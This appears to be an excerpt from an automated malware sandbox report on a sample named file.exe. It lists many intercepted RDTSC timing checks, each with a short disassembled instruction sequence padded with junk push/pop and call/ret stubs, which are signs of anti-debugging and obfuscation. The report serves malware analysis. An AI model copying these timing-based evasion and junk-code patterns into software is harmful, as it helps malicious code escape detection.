                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6EBB second address: EE6EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE6EC1 second address: EE6EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE98CA second address: EE98D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE98D1 second address: EE98DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE98DF second address: EE98ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F59Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9946 second address: EE99DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F2AD9523878h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F2AD9523878h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e mov edx, 606FE0E7h 0x00000043 call 00007F2AD9523879h 0x00000048 jmp 00007F2AD9523888h 0x0000004d push eax 0x0000004e pushad 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 pop edx 0x00000053 jns 00007F2AD9523878h 0x00000059 popad 0x0000005a mov eax, dword ptr [esp+04h] 0x0000005e jnl 00007F2AD952387Ah 0x00000064 mov eax, dword ptr [eax] 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE99DD second address: EE99E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE99E1 second address: EE99E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE99E5 second address: EE99EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9AC4 second address: EE9AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9AC8 second address: EE9ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9B15 second address: EE9B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F2AD9523880h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9B27 second address: EE9B8D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F2AD900F598h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F2AD900F598h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d movsx esi, di 0x00000040 call 00007F2AD900F599h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F2AD900F59Bh 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9B8D second address: EE9BC4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AD952387Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F2AD952388Dh 0x00000011 pushad 0x00000012 jmp 00007F2AD9523883h 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9BC4 second address: EE9BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2AD900F596h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9BCF second address: EE9C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F2AD9523887h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F2AD9523880h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 popad 0x00000023 pop eax 0x00000024 add si, BB36h 0x00000029 push 00000003h 0x0000002b mov edi, 7F6C4309h 0x00000030 push 00000000h 0x00000032 jp 00007F2AD952387Ch 0x00000038 mov dword ptr [ebp+122D37EBh], ebx 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F2AD9523878h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a sub dword ptr [ebp+122D2D02h], esi 0x00000060 adc edi, 413D611Ch 0x00000066 push 9EB2E900h 0x0000006b pushad 0x0000006c je 00007F2AD952387Ch 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF07 second address: EFBF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF0B second address: EFBF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C538 second address: F0C542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C542 second address: F0C547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C547 second address: F0C54D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C54D second address: F0C551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4AA8 second address: ED4AAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A919 second address: F0A932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523885h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A932 second address: F0A94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2AD900F598h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F2AD900F59Bh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A94F second address: F0A953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AEA8 second address: F0AEB2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AD900F596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AEB2 second address: F0AEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B01F second address: F0B023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B307 second address: F0B331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F2AD9523876h 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F2AD9523888h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B331 second address: F0B337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B337 second address: F0B33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B715 second address: F0B71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B71D second address: F0B73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Bh 0x00000009 pop ecx 0x0000000a popad 0x0000000b jl 00007F2AD9523888h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F2AD9523876h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BE7B second address: F0BE7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BE7F second address: F0BE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BE91 second address: F0BE9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2AD900F596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BFD2 second address: F0BFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BFD6 second address: F0BFE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BFE0 second address: F0BFE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0EA1D second address: F0EA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2AD900F5ACh 0x0000000c jmp 00007F2AD900F5A6h 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDB396 second address: EDB3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2AD9523889h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F18B05 second address: F18B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2AD900F596h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F18C5D second address: F18C79 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AD9523876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jno 00007F2AD952387Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F18C79 second address: F18C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1939E second address: F193A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19DF0 second address: F19E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F59Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F2AD900F59Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F2AD900F5A5h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E2C second address: F19E48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F2AD9523876h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E48 second address: F19E4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E4E second address: F19E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+122D2C6Ch] 0x00000010 push 4861DED2h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E71 second address: F19E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E75 second address: F19E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A1C8 second address: F1A1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AD900F59Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F2AD900F598h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A2E3 second address: F1A2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A2E7 second address: F1A2F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2AD900F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A2F9 second address: F1A2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A2FD second address: F1A303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A62A second address: F1A62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AB11 second address: F1AB1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F2AD900F596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AFA9 second address: F1AFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AFAF second address: F1AFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2AD900F59Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1B5B5 second address: F1B5BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BDB1 second address: F1BDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DB67 second address: F1DB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E59B second address: F1E5F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov si, bx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F2AD900F598h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+12457A9Ah], esi 0x00000032 xchg eax, ebx 0x00000033 jnp 00007F2AD900F59Ah 0x00000039 push edi 0x0000003a push edx 0x0000003b pop edx 0x0000003c pop edi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F2AD900F59Eh 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F0A2 second address: F1F0B8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2AD9523878h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F2AD952387Eh 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1C78F second address: F1C793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D8BE second address: F1D8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1C793 second address: F1C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F2AD900F596h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EE30 second address: F1EE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F920 second address: F1F950 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F2AD900F59Dh 0x0000000f jmp 00007F2AD900F5A0h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F2AD900F596h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FB9B second address: F1FBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2AD9523878h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 add esi, 4D535F1Ah 0x0000002c mov dword ptr [ebp+122D1D96h], edx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 js 00007F2AD9523876h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FBE4 second address: F1FBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2078E second address: F20792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F204D4 second address: F204D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20792 second address: F20798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20798 second address: F2079E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A41 second address: F24A46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A46 second address: F24A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21014 second address: F2101A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A53 second address: F24A97 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+122D25D5h], edi 0x0000000e or dword ptr [ebp+122D1B42h], ecx 0x00000014 push 00000000h 0x00000016 jmp 00007F2AD900F5A3h 0x0000001b push 00000000h 0x0000001d mov ebx, eax 0x0000001f mov ebx, dword ptr [ebp+122D17FAh] 0x00000025 xchg eax, esi 0x00000026 push ecx 0x00000027 push eax 0x00000028 js 00007F2AD900F596h 0x0000002e pop eax 0x0000002f pop ecx 0x00000030 push eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A97 second address: F24A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25A08 second address: F25AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2AD900F598h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 call 00007F2AD900F5A5h 0x0000002b or dword ptr [ebp+1247684Fh], ebx 0x00000031 pop ebx 0x00000032 mov edi, esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F2AD900F598h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 push 00000000h 0x00000052 push 00000000h 0x00000054 push ecx 0x00000055 call 00007F2AD900F598h 0x0000005a pop ecx 0x0000005b mov dword ptr [esp+04h], ecx 0x0000005f add dword ptr [esp+04h], 00000015h 0x00000067 inc ecx 0x00000068 push ecx 0x00000069 ret 0x0000006a pop ecx 0x0000006b ret 0x0000006c mov dword ptr [ebp+122D34D4h], ecx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F2AD900F5A1h 0x0000007a rdtsc
